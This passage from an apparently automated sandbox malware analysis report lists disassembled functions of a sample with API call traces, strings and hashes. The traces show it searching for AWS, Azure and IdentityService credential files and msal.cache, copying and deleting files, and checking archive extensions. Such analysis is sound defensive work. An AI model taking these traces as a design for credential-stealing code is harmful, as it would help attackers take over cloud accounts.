                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015A9C), ref: 00FF622D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,01015AA0), ref: 00FF6247
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF626E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: StrCmpCA.SHLWAPI(?,0101565D), ref: 00FF6282
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF629F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: PathMatchSpecA.SHLWAPI(?,?), ref: 00FF62CC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?), ref: 00FF6302
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015AB8), ref: 00FF6314
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF6327
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,01015ABC), ref: 00FF6339
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: lstrcatA.KERNEL32(?,?), ref: 00FF634D
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF6733
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF6755
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.aws\), ref: 00FF6772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: wsprintfA.USER32 ref: 00FF62B6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: CopyFileA.KERNEL32(?,?,00000001), ref: 00FF6406
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: DeleteFileA.KERNEL32(?), ref: 00FF647A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindNextFileA.KERNEL32(?,?), ref: 00FF64DC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF61AE: FindClose.KERNEL32(?), ref: 00FF64F0
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF67A7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00FF67C9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00FF67E6
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF681B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                                                                                                          • API String ID: 780282842-974132213
                                                                                                                                                                                                                                                          • Opcode ID: 8bc55519e57f1a2f5b2e78faa2e323bbd28bd96eafea6c2fb117b1b4b42a399c
                                                                                                                                                                                                                                                          • Instruction ID: a36a0b18011254f405154bfe9fb5284f84f87da17fc56ce6efd6e98f4408b89f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bc55519e57f1a2f5b2e78faa2e323bbd28bd96eafea6c2fb117b1b4b42a399c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6141837298021C6FDB24EB61EC4BFEE737CBF09700F440495B744EA195EAB89A849F50
                                                                                                                                                                                                                                                          Function 00FEAD1F Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FEADC4
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FEAECE
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FEAED5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016410,00000000), ref: 00FEAF86
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016414), ref: 00FEAFAE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEAFD2
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01016418), ref: 00FEAFDE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEAFE8
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0101641C), ref: 00FEAFF4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEAFFE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01016420), ref: 00FEB00A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEB014
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01016424), ref: 00FEB020
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEB02A
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01016428), ref: 00FEB036
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEB040
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0101642C), ref: 00FEB04C
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 00FEB056
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,01016430), ref: 00FEB062
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00FEB0B4
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FEB0CF
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FEB112
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1139693110-0
                                                                                                                                                                                                                                                          • Opcode ID: 1421e81c594acfa3fdd186d61f3e22c2636d381718280dd3ccf53d636949645f
                                                                                                                                                                                                                                                          • Instruction ID: c05e4df193b38fd2a88cf346fa60c6941cc2ef6ab6a73b3b642651b9a06f2af7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1421e81c594acfa3fdd186d61f3e22c2636d381718280dd3ccf53d636949645f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC11732900109AFDF51BBA1ED4A8EE7B79BF14301F514025F701B7166DBBA6E06AF90
                                                                                                                                                                                                                                                          Function 00FFB2F2 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,771A83C0,00000000,00FFBFDD,?), ref: 00FFB2F7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,01015154), ref: 00FFB325
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.zip), ref: 00FFB335
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.zoo), ref: 00FFB341
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.arc), ref: 00FFB34D
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.lzh), ref: 00FFB359
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.arj), ref: 00FFB365
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.gz), ref: 00FFB371
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(771A83C0,.tgz), ref: 00FFB37D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                          • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                                                                                                                                                                                                                          • API String ID: 1659193697-51310709
                                                                                                                                                                                                                                                          • Opcode ID: 17af65b81cee03dbe965f2d880e491cf6bc9cdf723c40b889a3502d13bdfd3ae
                                                                                                                                                                                                                                                          • Instruction ID: 4f933e8cf5bf808964542731e9ef946f4fd1a8607ef470fc4e872df71532037a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17af65b81cee03dbe965f2d880e491cf6bc9cdf723c40b889a3502d13bdfd3ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06017525EC532FA15B222232DC55E7E2E5D8FC3FE47440519EA40EE068EBDC884375B2
                                                                                                                                                                                                                                                          Function 6CD4DA70 Relevance: 26.6, APIs: 9, Strings: 6, Instructions: 362libraryloadersynchronizationCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4A9E0: SetLastError.KERNEL32(00000000), ref: 6CD4AAA7
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4A9E0: GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CD4AAAF
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4A9E0: GetLastError.KERNEL32 ref: 6CD4AABB
                                                                                                                                                                                                                                                            • Part of subcall function 6CD4A9E0: GetLastError.KERNEL32 ref: 6CD4AACD
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD4DC12
                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 6CD4DC1B
                                                                                                                                                                                                                                                          • RtlCaptureContext.KERNEL32(?), ref: 6CD4DC3B
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64), ref: 6CD4DC7D
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6CD4DCA7
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6CD4DCBC
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6CD4DCDF
                                                                                                                                                                                                                                                          • ReleaseMutex.KERNEL32(?), ref: 6CD4DE01
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6CD4DF34
                                                                                                                                                                                                                                                            • Part of subcall function 6CD1AC00: HeapFree.KERNEL32(00000000,0000000C), ref: 6CD4EBD8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • StackWalkEx, xrefs: 6CD4DCD4
                                                                                                                                                                                                                                                          • stack backtrace:, xrefs: 6CD4DB97
                                                                                                                                                                                                                                                          • SymFunctionTableAccess64, xrefs: 6CD4DC72
                                                                                                                                                                                                                                                          • SymGetModuleBase64, xrefs: 6CD4DC9C
                                                                                                                                                                                                                                                          • StackWalk64, xrefs: 6CD4DF29
                                                                                                                                                                                                                                                          • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 6CD4DE28
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryFreeHeapMutexReleaseThread
                                                                                                                                                                                                                                                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                                                                                                                                                                                                                                          • API String ID: 2896442597-500235477
                                                                                                                                                                                                                                                          • Opcode ID: 99ad8b1cad08acf21f2f89f1263d36b147815fb07c4ca711ae2c04d708c33f2e
                                                                                                                                                                                                                                                          • Instruction ID: 0b4084f880e067f63ea27422850da9bf7cb024210a3f577afda782219c2f371c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99ad8b1cad08acf21f2f89f1263d36b147815fb07c4ca711ae2c04d708c33f2e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38F118B5500B00DFE721CF25C945B93BBF4BB05708F10891DE6AA87AA1DB71B549CB61
                                                                                                                                                                                                                                                          Function 00FF3785 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF37C7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,true), ref: 00FF3889
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
                                                                                                                                                                                                                                                            • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00FF394B
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF397C
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF39B8
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF39F4
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF3A30
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF3A6C
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FF3AA8
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF3B6C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                          • Opcode ID: 277d730833c9b519a6dd3a84e4988a883d4c6e24e4e3937b7007c6b05de3468d
                                                                                                                                                                                                                                                          • Instruction ID: 63cc36099cb90757b61db3d95bdb3d4e952da4934930f8a7b1d568c215747574
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 277d730833c9b519a6dd3a84e4988a883d4c6e24e4e3937b7007c6b05de3468d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B1387680021C9FCB60EF55DC89AE977B9BF14300F0001E5EA49A7266EB75AF85EF40
                                                                                                                                                                                                                                                          Function 00FF3B9F Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
